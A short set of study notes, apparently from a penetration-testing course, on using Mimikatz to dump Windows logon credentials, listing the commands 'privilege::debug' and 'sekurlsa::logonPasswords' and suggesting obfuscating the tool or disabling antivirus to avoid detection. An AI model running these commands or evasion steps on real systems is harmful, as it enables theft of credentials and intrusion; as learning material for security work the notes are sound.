Search

Mimikatz (there’s also Kiwi)

  • Gets picked up by any anti-virus
    • Need to obfuscate it
  • Could use it if you control the AV and could just turn it off
image

turn on debug privilege:

privilege::debug

SekurLSA:

sekurlsa:: #to view options

Logon Passwords:

sekurlsa::logonPasswords
image

Happens because of the mapped drive that is logged into using other (admin) credentials.